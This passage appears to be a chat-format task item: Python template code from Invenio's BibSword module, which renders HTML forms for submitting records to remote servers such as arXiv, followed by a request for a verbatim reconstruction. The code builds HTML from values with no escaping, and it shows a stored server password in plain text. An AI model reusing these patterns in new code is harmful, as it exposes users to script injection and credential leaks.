html code that display the submission table\n @param (submissions) : list of all submissions and their status\n @return : html code to be displayed\n '''\n\n if error_messages == None :\n error_messages = []\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n %(error_message)s\n\n <input type=\"hidden\" name=\"status\" value=\"display_submission\"/>\n <input type=\"hidden\" name=\"first_row\" value=\"%(first_row)s\"/>\n <input type=\"hidden\" name=\"last_row\" value=\"%(last_row)s\"/>\n <input type=\"hidden\" name=\"total_rows\" value=\"%(total_rows)s\" />\n\n <input type=\"submit\" name=\"submit\" value=\"New submission\"/><br/>\n <br />\n <input type=\"submit\" name=\"submit\" value=\"Refresh all\"/><br/>\n <br />\n Display\n <select name=\"offset\">\n <option value=\"5\" %(selected_1)s>5</option>\n <option value=\"10\" %(selected_2)s>10</option>\n <option value=\"25\" %(selected_3)s>25</option>\n <option value=\"50\" %(selected_4)s>50</option>\n <option value=%(total_rows)s %(selected_5)s>all</option>\n </select>\n rows per page <input type=\"submit\" name=\"submit\" value=\"Select\" /><br />\n <br />\n <input type=\"submit\" name=\"submit\" value=\"First\" %(is_prev)s/>\n <input type=\"submit\" name=\"submit\" value=\"Prev\" %(is_prev)s/>\n Pages %(first_row)s - %(last_row)s / %(total_rows)s\n <input type=\"submit\" name=\"submit\" value=\"Next\" %(is_last)s/>\n <input type=\"submit\" name=\"submit\" value=\"Last\" %(is_last)s/><br/>\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"7\" bgcolor=\"#e6e6fa\">\n <h2>Submission state</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Remote server</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Submitter</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Record number</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Remote id</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Status</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Dates</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Links</b></td>\n </tr>\n %(submissions)s\n </table>\n</form>''' % {\n 'error_message' : \\\n self.display_error_message_row(error_messages),\n 'table_width' : '100%',\n 'first_row' : first_row,\n 'last_row' : last_row,\n 'total_rows' : total_rows,\n 'is_prev' : is_prev,\n 'is_last' : is_last,\n 'selected_1' : offset[0],\n 'selected_2' : offset[1],\n 'selected_3' : offset[2],\n 'selected_4' : offset[3],\n 'selected_5' : offset[4],\n 'submissions' : self.fill_submission_table(submissions)\n }\n\n return body\n\n\n def tmpl_display_remote_server_info(self, server_info) :\n '''\n Display a table containing all server informations\n @param (server_info) : tuple containing all server infos\n @return : html code for the table containing infos\n '''\n\n body = '''<table width=\"%(table_width)s\">\\n''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">ID</td>\\n''' \\\n ''' <td>%(server_id)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Name</td>\\n''' \\\n ''' <td>%(server_name)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Host</td>\\n''' \\\n ''' <td>%(server_host)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Username</td>\\n''' \\\n ''' <td>%(username)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Password</td>\\n''' \\\n ''' <td>%(password)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Email</td>\\n''' \\\n ''' <td>%(email)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Realm</td>\\n''' \\\n ''' <td>%(realm)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">Record URL</td>\\n''' \\\n ''' <td>%(url_base_record)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n ''' <tr>\\n''' \\\n ''' <td bgcolor=\"#e6e6fa\">URL Servicedocument</td>\\n'''\\\n ''' <td>%(url_servicedocument)s</td>\\n''' \\\n ''' </tr>\\n ''' \\\n '''</table>''' % {\n 'table_width' : '50%',\n 'server_id' : server_info['server_id'],\n 'server_name' : server_info['server_name'],\n 'server_host' : server_info['server_host'],\n 'username' : server_info['username'],\n 'password' : server_info['password'],\n 'email' : server_info['email'],\n 'realm' : server_info['realm'],\n 'url_base_record' : server_info['url_base_record'],\n 'url_servicedocument' : server_info['url_servicedocument']\n }\n\n return body\n\n\n def tmpl_display_remote_servers(self, remote_servers, id_record,\n error_messages):\n '''\n format the html code that display a dropdown list containing the\n servers\n @param (self) : reference to the current instance of the class\n @param (remote_servers) : list of tuple containing server's infos\n @return : string containing html code\n '''\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <input type=\"hidden\" name=\"status\" value=\"select_server\"/>\n %(error_message)s\n\n <input type=\"submit\" name=\"submit\" value=\"Cancel\" />\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Forward a record</h2>\n </td>\n </tr>\n <tr>\n <td align=\"right\" width=\"%(row_width)s\">\n <p>Enter the number of the repord to submit : </p>\n </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <input type=\"text\" name=\"id_record\" size=\"20\"\n value=\"%(id_record)s\"/>\n </td>\n </tr>\n <tr>\n <td align=\"right\" width=\"%(row_width)s\">\n <p>Select a remote server : </p>\n </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <select name=\"id_remote_server\" size=\"1\">\n <option value=\"0\">-- select a remote server --</option>\n %(remote_server)s\n </select>\n </td>\n </tr>\n <tr>\n <td colspan=\"2\" align=\"center\">\n <input type=\"submit\" value=\"Select\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n</form>''' % {\n 'error_message' : \\\n self.display_error_message_row(error_messages),\n 'table_width' : '100%',\n 'row_width' : '50%',\n 'id_record' : id_record,\n 'remote_server' : \\\n self.fill_dropdown_remote_servers(remote_servers)\n }\n\n return body\n\n\n def tmpl_display_collections(self, selected_server, server_infos,\n collections, id_record, recid, error_messages):\n '''\n format the html code that display the selected server, the informations\n about the selected server and a dropdown list containing the server's\n collections\n @param (self) : reference to the current instance of the class\n @param (selected_server) : tuple containing selected server name and id\n @param (server_infos) : tuple containing infos about selected server\n @param (collections) : list contianing server's collections\n @param (remote_servers) : list of tuple containing server's infos\n @return : string containing html code\n '''\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <input type=\"hidden\" name=\"status\" value=\"select_collection\"/>\n <input type=\"hidden\" name=\"id_remote_server\" value=\"%(id_server)s\"/>\n <input type=\"hidden\" name=\"id_record\" value=\"%(id_record)s\"/>\n <input type=\"hidden\" name=\"recid\" value=\"%(recid)s\"/>\n\n %(error_message)s\n\n <input type=\"submit\" name=\"submit\" value=\"Cancel\" />\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Remote server</h2></td>\n </tr>\n <tr>\n <td align=\"center\" rowspan=\"2\" valign=\"center\">\n <h2>%(server_name)s</h2>\n </td>\n <td align=\"left\">\n SWORD version : %(server_version)s\n </td>\n </tr>\n <tr>\n <td align=\"left\">\n Max upload size [Kb] : %(server_maxUpload)s\n </td>\n </tr>\n <tr>\n <td align=\"left\" colspan=\"2\">\n <input type=\"submit\" value=\"Modify server\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n <p> </p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\"><h2>Collection</h2>\n </td>\n </tr>\n <tr>\n <td align=\"right\" width=\"%(row_width)s\">Select a collection : </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <select name=\"id_collection\" size=\"1\">\n <option value=\"0\">-- select a collection --</option>\n %(collection)s\n </select>\n </td>\n </tr>\n <tr>\n <td align=\"center\" colspan=\"2\">\n <input type=\"submit\" value=\"Select\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n\n</form>''' % {\n 'table_width' : '100%',\n 'row_width' : '50%',\n 'error_message' : \\\n self.display_error_message_row(error_messages),\n 'id_server' : selected_server['id'],\n 'server_name' : selected_server['name'],\n 'server_version' : server_infos['version'],\n 'server_maxUpload' : server_infos['maxUploadSize'],\n 'collection' : \\\n self.fill_dropdown_collections(collections),\n 'id_record' : id_record,\n 'recid' : recid\n }\n\n return body\n\n\n def tmpl_display_categories(self, selected_server, server_infos,\n selected_collection, collection_infos,\n primary_categories, secondary_categories,\n id_record, recid, error_messages):\n '''\n format the html code that display the selected server, the informations\n about the selected server, the selected collections, the informations\n about the collection and a dropdown list containing the server's\n primary and secondary categories\n @param (self) : reference to the current instance of the class\n @param (selected_server) : tuple containing selected server name and id\n @param (server_infos) : tuple containing infos about selected server\n @param (collections) : tuple containing selected collection\n @param (collection_infos) : tuple containing infos about selected col\n @param (primary_categories) : list of mandated categories for the col\n @param (remote_servers) : list of optional categories for the col\n @return : string containing html code\n '''\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <input type=\"hidden\" name=\"status\" value=\"select_primary_category\"/>\n <input type=\"hidden\" name=\"id_remote_server\" value=\"%(id_server)s\"/>\n <input type=\"hidden\" name=\"id_collection\" value=\"%(id_collection)s\"/>\n <input type=\"hidden\" name=\"id_record\" value=\"%(id_record)s\"/>\n <input type=\"hidden\" name=\"recid\" value=\"%(recid)s\"/>\n\n %(error_message)s\n\n <input type=\"submit\" name=\"submit\" value=\"Cancel\" />\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Remote server</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" rowspan=\"2\" valign=\"center\">\n <h2>%(server_name)s</h2>\n </td>\n <td align=\"left\">\n SWORD version : %(server_version)s\n </td>\n </tr>\n <tr>\n <td align=\"left\">\n Max upload size [Kb] : %(server_maxUpload)s\n </td>\n </tr>\n <tr>\n <td align=\"left\" colspan=\"2\">\n <input type=\"submit\" value=\"Modify server\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n <p> </p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Collection</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" rowspan=\"2\" valign=\"center\">\n <h2>%(collection_name)s</h2>\n </td>\n <td align=\"left\">\n URL : %(collection_url)s\n </td>\n </tr>\n <tr>\n <td align=\"left\">\n Accepted media types:\n <ul>%(collection_accept)s</ul>\n </td>\n </tr>\n <tr>\n <td align=\"left\" colspan=2>\n <input type=\"submit\" value=\"Modify collection\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n <p> </p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Mandatory category</h2>\n </td>\n </tr>\n <tr>\n <td align=\"right\" width=\"%(row_width)s\">\n <p>Select a mandated category : </p>\n </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <select name=\"id_primary\" size=\"1\">\n <option value=\"0\">-- select a category --</option>\n %(primary_categories)s\n </select>\n </td>\n </tr>\n </table>\n <p></p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Optional categories</h2>\n </td>\n </tr>\n <td align=\"right\" width=\"%(row_width)s\">\n <p>Select optional categories : </p>\n </td>\n <td align=\"left\" width=\"%(row_width)s\">\n <select name=\"id_categories\" size=\"10\" multiple>\n %(secondary_categories)s\n </select>\n </td>\n </tr>\n </table>\n <p> </p>\n\n <center>\n <input type=\"submit\" value=\"Select\" name=\"submit\"/>\n </center>\n\n</form>''' % {\n 'table_width' : '100%',\n 'row_width' : '50%',\n 'error_message' : self.display_error_message_row(\n error_messages),\n\n # hidden input\n 'id_server' : selected_server['id'],\n 'id_collection' : selected_collection['id'],\n 'id_record' : id_record,\n 'recid' : recid,\n\n # variables values\n 'server_name' : selected_server['name'],\n 'server_version' : server_infos['version'],\n 'server_maxUpload' : server_infos['maxUploadSize'],\n\n 'collection_name' : selected_collection['label'],\n\n 'collection_accept' : ''.join([\n '''<li>%(name)s </li>''' % {\n 'name' : accept\n } for accept in collection_infos['accept'] ]),\n\n 'collection_url' : selected_collection['url'],\n 'primary_categories' : self.fill_dropdown_primary(\n primary_categories),\n\n 'secondary_categories': self.fill_dropdown_secondary(\n secondary_categories)\n }\n\n return body\n\n\n def tmpl_display_metadata(self, user, server, collection, primary,\n categories, medias, metadata, id_record, recid,\n error_messages):\n '''\n format a string containing every informations before a submission\n '''\n\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <input type=\"hidden\" name=\"status\" value=\"check_submission\"/>\n <input type=\"hidden\" name=\"id_remote_server\" value=\"%(id_server)s\"/>\n <input type=\"hidden\" name=\"id_collection\" value=\"%(id_collection)s\"/>\n <input type=\"hidden\" name=\"id_primary\" value=\"%(id_primary)s\"/>\n <input type=\"hidden\" name=\"id_categories\" value=\"%(id_categories)s\"/>\n <input type=\"hidden\" name=\"id_record\" value=\"%(id_record)s\"/>\n <input type=\"hidden\" name=\"recid\" value=\"%(recid)s\"/>\n\n %(error_message)s\n\n <input type=\"submit\" name=\"submit\" value=\"Cancel\" />\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"2\" bgcolor=\"#e6e6fa\">\n <h2>Destination</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" rowspan=\"3\" valign=\"center\">\n <h2>%(server_name)s</h2>\n </td>\n <td align=\"left\">\n Collection : %(collection_name)s ( %(collection_url)s )\n </td>\n </tr>\n <tr>\n <td align=\"left\">\n Primary category : %(primary_name)s ( %(primary_url)s )\n </td>\n </tr>\n%(categories)s\n <tr>\n <td align=\"left\" colspan=\"2\">\n <input type=\"submit\" value=\"Modify destination\" name=\"submit\"/>\n </td>\n </tr>\n </table>\n <p> </p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"4\" bgcolor=\"#e6e6fa\">\n <h2>Submitter</h2>\n </td>\n </tr>\n <tr>\n <td width=\"%(row_width)s\">Name :</td>\n <td><input type=\"text\" name=\"author_name\" size=\"100\"\n value=\"%(user_name)s\"/></td>\n </tr>\n <tr>\n <td>Email :</td>\n <td><input type=\"text\" name=\"author_email\" size=\"100\"\n value=\"%(user_email)s\"/></td>\n </tr>\n </table>\n <p></p>\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"4\" bgcolor=\"#e6e6fa\"><h2>Media</h2></td>\n </tr>\n <tr><td colspan=\"4\">%(medias)s%(media_help)s</td></tr>\n </table>\n <p></p>\n\n\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"3\" bgcolor=\"#e6e6fa\"><h2>Metadata</h2> <font color=\"red\"><b>Warning :</b> modification(s) will not be saved on Invenio</font>\n </td>\n </tr>\n <tr>\n <td align=\"left\" width=\"%(row_width)s\"><p>Id* :</p></td>\n <td><input type=\"text\" name=\"id\" size=\"100\" value=\"%(id)s\"/></td>\n </tr>\n <tr>\n <td align=\"left\" width=\"%(row_width)s\"><p>Title* :</p></td>\n <td><input type=\"text\" name=\"title\" size=\"100\" value=\"%(title)s\"/>\n </td>\n </tr>\n <tr>\n <td align=\"left\" width=\"%(row_width)s\"><p>Summary* :</p></td>\n <td>\n <textarea name=\"summary\" rows=\"4\" cols=\"100\">%(summary)s\n </textarea>\n </td>\n </tr>\n%(contributors)s\n%(journal_refs)s\n%(report_nos)s\n </table>\n\n <p><font color=\"red\">The fields having a * are mandatory</font></p>\n\n <center>\n <input type=\"submit\" value=\"Submit\" name=\"submit\"/>\n </center>\n\n<form>''' % {\n 'table_width' : '100%',\n 'row_width' : '25%',\n 'error_message' : \\\n self.display_error_message_row(error_messages),\n\n # hidden input\n 'id_server' : server['id'],\n 'id_collection' : collection['id'],\n 'id_primary' : primary['id'],\n 'id_categories' : self.get_list_id_categories(categories),\n 'id_record' : id_record,\n 'recid' : recid,\n\n # variables values\n 'server_name' : server['name'],\n 'collection_name' : collection['label'],\n 'collection_url' : collection['url'],\n 'primary_name' : primary['label'],\n 'primary_url' : primary['url'],\n 'categories' : self.fill_optional_category_list(categories),\n\n #user\n 'user_name' : user['nickname'],\n 'user_email' : user['email'],\n\n # media\n 'medias' : self.fill_media_list(medias, server['id']),\n 'media_help' : self.fill_arxiv_help_message(),\n\n # metadata\n 'id' : metadata['id'],\n 'title' : metadata['title'],\n 'summary' : metadata['summary'],\n 'contributors' : self.fill_contributors_list(\n metadata['contributors']),\n 'journal_refs' : self.fill_journal_refs_list(\n metadata['journal_refs']),\n 'report_nos' : self.fill_report_nos_list(\n metadata['report_nos'])\n }\n\n return body\n\n\n def tmpl_display_list_submission(self, submissions):\n '''\n Display the data of submitted recods\n '''\n\n body = '''\n<form method=\"post\" enctype=\"multipart/form-data\" onsubmit=\"return tester();\"\n accept-charset=\"UTF-8\">\n <table border=\"1\" valign=\"top\" width=\"%(table_width)s\">\n <tr>\n <td align=\"left\" colspan=\"7\" bgcolor=\"#e6e6fa\">\n <h2>Document successfully submitted !</h2>\n </td>\n </tr>\n <tr>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Remote server</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Submitter</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Record id</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Remote id</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Status</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Dates</b></td>\n <td align=\"center\" bgcolor=\"#e6e6fa\"><b>Links</b></td>\n </tr>\n %(submissions)s\n </table>\n <a href=%(CFG_SITE_URL)s/bibsword>Return</a>\n</form>''' % {\n 'table_width' : '100%',\n 'submissions' : self.fill_submission_table(submissions),\n 'CFG_SITE_URL' : CFG_SITE_URL\n }\n\n return body\n\n\n #***************************************************************************\n # Private functions\n #***************************************************************************\n\n\n def display_error_message_row(self, error_messages):\n '''\n return a list of error_message in form of a bullet list\n @param (error_messages) : list of error_messages to display\n @return : html code that display list of errors\n '''\n\n # if no errors, return nothing\n if len(error_messages) == 0:\n return ''\n\n if len(error_messages) == 1:\n # display a generic header message\n body = '''\n<tr>\n <td align=\"left\" colspan=2>\n <font color='red'>\n <p> The following error was found in the formular : </p>\n <ul>\n'''\n\n else :\n # display a generic header message\n body = '''\n<tr>\n <td align=\"left\" colspan=2>\n <font color='red'>\n <p> Following errors were found in the formular : </p>\n <ul>\n'''\n\n # insert each error lines\n for error_message in error_messages :\n body = body + '''\n <li>%(error)s</li>''' % {\n 'error' : error_message\n }\n\n body = body + '''\n </ul>\n </font>\n </td>\n</tr>'''\n\n return body\n\n\n def fill_submission_table(self, submissions) :\n '''\n This method return the body of the submission state table. each\n submissions given in parameters has one row\n @param (submissions) : submission status list\n @return: html table body\n '''\n\n return ''.join([\n ''' <tr>\n <td>%(id_server)s : <a href=\"%(server_infos)s\">\n %(server_name)s</a></td>\n <td>%(user_name)s <br/> %(user_email)s</td\n <td>%(id_bibrec)s : <a href=\"%(cfg_site_url)s/record/%(id_bibrec)s\"\n target=\"_blank\">%(no_bibrec)s</a></td>\n <td><a href=\"%(url_base_remote)s/%(id_remote)s\" target=\"_blank\">\n %(id_remote)s</a></td>\n <td>%(status)s</td>\n <td><b>submission : </b> %(submission_date)s <br/>\n <b>publication : </b> %(publication_date)s <br/>\n <b>removal : </b> %(removal_date)s </td>\n <td><b>media : </b> <a href=\"%(media_link)s\" target=\"_blank\">\n %(media_link)s</a> <br/>\n <b>metadata : </b> <a href=\"%(metadata_link)s\" target=\"_blank\">\n %(metadata_link)s</a> <br />\n <b>status : </b> <a href=\"%(status_link)s\" target=\"_blank\">\n %(status_link)s</a></td>\n </tr>''' % {\n 'id_server' : str(submission['id_server']),\n 'server_infos' : \"%s/bibsword/remoteserverinfos?id=%s\" % \\\n (CFG_SITE_URL, submission['id_server']),\n 'server_name' : str(submission['server_name']),\n 'user_name' : str(submission['user_name']),\n 'user_email' : str(submission['user_email']),\n 'id_bibrec' : str(submission['id_record']),\n 'no_bibrec' : str(submission['report_no']),\n 'id_remote' : str(submission['id_remote']),\n 'status' : str(submission['status']),\n 'submission_date' : str(submission['submission_date']),\n 'publication_date' : str(submission['publication_date']),\n 'removal_date' : str(submission['removal_date']),\n 'media_link' : str(submission['link_medias']),\n 'metadata_link' : str(submission['link_metadata']),\n 'status_link' : str(submission['link_status']),\n 'url_base_remote' : str(submission['url_base_remote']),\n 'cfg_site_url' : CFG_SITE_URL\n } for submission in submissions])\n\n\n def fill_dropdown_remote_servers(self, remote_servers):\n '''\n This method fill a dropdown list of remote servers.\n @param (collections) : list of all collections with name - url\n @param (selected_col_url) : URL of the selected collection\n @return (html colde) : code html to display\n '''\n\n return ''.join([\n '''<option value=\"%(id)s\">%(name)s - %(host)s</option>''' % {\n 'id' : str(remote_server['id']),\n 'name' : remote_server['name'],\n 'host' : remote_server['host']\n } for remote_server in remote_servers])\n\n\n def fill_dropdown_collections(self, collections):\n '''\n This method fill a dropdown list of collection.\n @param (collections) : list of all collections with name - url\n @param (selected_col_url) : URL of the selected collection\n @return (html colde) : code html to display\n '''\n\n return ''.join([\n '''<option value=\"%(id)s\">%(name)s</option>''' % {\n 'id' : str(collection['id']),\n 'name' : collection['label']\n } for collection in collections])\n\n\n\n def fill_dropdown_primary(self, primary_categories):\n '''\n This method fill the primary dropdown list with the data given in\n parameter\n @param (primary) : list of 'url' 'name' tuples\n @return (body) : html code generated to display the list\n '''\n return ''.join([\n '''<option value=\"%(id)s\">%(name)s</option>''' % {\n 'id' : primary_categorie['id'],\n 'name' : primary_categorie['label']\n } for primary_categorie in primary_categories])\n\n\n def fill_dropdown_secondary(self, categories):\n '''\n This method fill a category list. This list is allows the multi-selection\n or items. To proced to select more than one categorie through a browser\n ctrl + clic\n @param (categories) : list of all categories in the format name - url\n @reutrn (html code) : the html code that display each dropdown list\n '''\n\n if len(categories) == '' :\n return ''\n\n return ''.join([\n '''<option value=\"%(id)s\">%(name)s</option>''' % {\n 'id' : category['id'],\n 'name' : category['label']\n } for category in categories])\n\n\n\n def fill_optional_category_list(self, categories):\n '''\n This method fill a table row that contains name and url of the selected\n optional categories\n @param (self) : reference to the current instance of the class\n @param (categories) : list of tuples containing selected categories\n @return (body) : html code generated to display the list\n '''\n\n if len(categories) == 0 :\n return ''\n\n else :\n body = '<tr><td>'\n\n body = body + ''.join([\n '''<p>Category : %(category_name)s ( %(category_url)s )</p>'''%{\n 'category_name' : category['label'],\n 'category_url' : category['url']\n } for category in categories\n ])\n\n body = body + '</td></tr>'\n return body\n\n\n def fill_media_list(self, medias, id_server, from_websubmit=False):\n '''\n Concatenate the string that contains all informations about the medias\n '''\n\n text = ''\n\n if id_server == 1 :\n\n media_type = self.format_media_list_by_type(medias)\n\n text = '''<h2>Please select files you would like to push to arXiv:</h2>'''\n\n for type in media_type :\n text += '''<h3><b>%s : </b></h3>''' % type['media_type']\n text += '''<blockquote>'''\n for media in type['media_list'] :\n text += '''<input type='checkbox' name=\"media\" value=\"%s\" %s>%s</input><br />''' % (media['path'], media['selected'], media['name'])\n text += \"</blockquote>\"\n\n text += '''<h3>Upload</h3>'''\n text += '''<blockquote>'''\n text += '''<p>In addition, you can submit a new file (that will be added to the record as well):</p>'''\n\n if from_websubmit == False :\n text += '''<input type=\"file\" name=\"new_media\" size=\"60\"/>'''\n return text\n\n\n def fill_arxiv_help_message(self) :\n text = '''</blockquote><h3>Help</h3>'''\n text += '''<blockquote><p>For more help on which formats are supported by arXiv, please see :'''\\\n '''<ul>'''\\\n '''<li><a href=\"http://arxiv.org/help/submit\" target=\"_blank\">'''\\\n '''arXiv submission process</a></li>'''\\\n '''<li><a href=\"http://arxiv.org/help/submit_tex\" target=\"_blank\">'''\\\n '''arXiv TeX submission</a></li>'''\\\n '''<li><a href=\"http://arxiv.org/help/submit_docx\" target=\"_blank\">'''\\\n '''arXiv Docx submission</a></li>'''\\\n '''<li><a href=\"http://arxiv.org/help/submit_pdf\" target=\"_blank\">'''\\\n '''arXiv PDF submission</a></li>'''\\\n '''</ul></blockquote>'''\n return text\n\n\n def fill_contributors_list(self, contributors) :\n '''\n This method display each contributors in the format of an editable input\n text. This allows the user to modifie it.\n @param (contributors) : The list of all contributors of the document\n @return (html code) : the html code that display each dropdown list\n '''\n\n output = ''\n\n is_author = True\n\n for author in contributors :\n\n nb_rows = 2\n\n author_name = \\\n '''<LABEL for=\"name\">Name: </LABEL><input type = \"text\" ''' \\\n '''name = \"contributor_name\" size = \"100\" value = \"%s\" ''' \\\n '''id=\"name\"/>''' % author['name']\n\n author_email = \\\n '''<LABEL for = \"email\">Email: </LABEL>''' \\\n '''<input type = \"text\" name = \"contributor_email\" ''' \\\n '''size = \"100\" value = \"%s\" id = \"email\"/>''' % author['email']\n\n author_affiliations = []\n for affiliation in author['affiliation'] :\n affiliation_row = \\\n '''<LABEL for = \"affiliation\">Affiliation: </LABEL> ''' \\\n '''<input type=\"text\" name = \"contributor_affiliation\" ''' \\\n '''size = \"100\" value = \"%s\" id = \"affiliation\"/>''' % \\\n affiliation\n author_affiliations.append(affiliation_row)\n nb_rows = nb_rows + 1\n affiliation_row = \\\n '''<LABEL for = \"affiliation\">Affiliation: </LABEL>''' \\\n '''<input type = \"text\" name = \"contributor_affiliation\" ''' \\\n '''size = \"100\" id = \"affiliation\"/>'''\n author_affiliations.append(affiliation_row)\n nb_rows = nb_rows + 1\n\n if is_author :\n output += '''<tr><td rowspan = \"%s\">Author : </td>''' % nb_rows\n is_author = False\n else :\n output += '''<tr><td rowspan = \"%s\">Contributor : </td>''' % \\\n nb_rows\n output += '''<td>%s</td></tr>''' % author_name\n if author_email != '':\n output += '''<tr><td>%s</td></tr>''' % author_email\n for affiliation in author_affiliations :\n output += '''<tr><td>%s</td></tr>''' % affiliation\n output += \\\n '''<input type = \"hidden\" name = \"contributor_affiliation\" ''' \\\n '''value = \"next\"/>'''\n\n return output\n\n\n def fill_journal_refs_list(self, journal_refs):\n '''\n This method display each journal references in the format of an editable\n input text. This allows the user to modifie it.\n @param (journal_refs) : The list of all journal references of the document\n @return (html code) : the html code that display each dropdown list\n '''\n\n html = ''\n\n if len(journal_refs) > 0:\n\n html += '''\n <tr>\n <td align=\"left\"><p>Journal references : </p></td><td>\n '''\n\n html = html + ''.join([\n '''\n <p><input type=\"text\" name=\"journal_refs\" size=\"100\" ''' \\\n '''value=\"%(journal_ref)s\"/></p>\n ''' % {\n 'journal_ref' : journal_ref\n } for journal_ref in journal_refs\n ])\n\n html = html + '''\n </td>\n </tr>\n '''\n\n return html\n\n\n def fill_report_nos_list(self, report_nos) :\n '''\n Concatate a string containing the report number html table rows\n '''\n\n html = ''\n\n if len(report_nos) > 0:\n\n html = '''\n <tr>\n <td align=\"left\"><p>Report numbers : </p></td><td>\n '''\n\n html = html + ''.join([\n '''\n <p><input type=\"text\" name=\"report_nos\" size=\"100\" ''' \\\n '''value=\"%(report_no)s\"/></p>''' % {\n 'report_no' : report_no\n } for report_no in report_nos\n ])\n\n html = html + '''\n </td>\n </tr>\n '''\n\n return html\n\n\n def get_list_id_categories(self, categories):\n '''\n gives the id of the categores tuple\n '''\n\n id_categories = []\n\n for category in categories:\n id_categories.append(category['id'])\n\n return id_categories\n\n\n def format_media_list_by_type(self, medias) :\n '''\n This function format the media by type (Main, Uploaded, ...)\n '''\n\n #format media list by type of document\n media_type = []\n\n for media in medias :\n\n # if it is the first media of this type, create a new type\n is_type_in_media_type = False\n for type in media_type :\n if media['collection'] == type['media_type'] :\n is_type_in_media_type = True\n\n if is_type_in_media_type == False :\n type = {}\n type['media_type'] = media['collection']\n type['media_list'] = []\n media_type.append(type)\n\n # insert the media in the good media_type element\n for type in media_type :\n if type['media_type'] == media['collection'] :\n type['media_list'].append(media)\n\n return media_type\n```\nReturn a verbatim reconstruction of the code.",
"role": "user"
}
] |
[
{
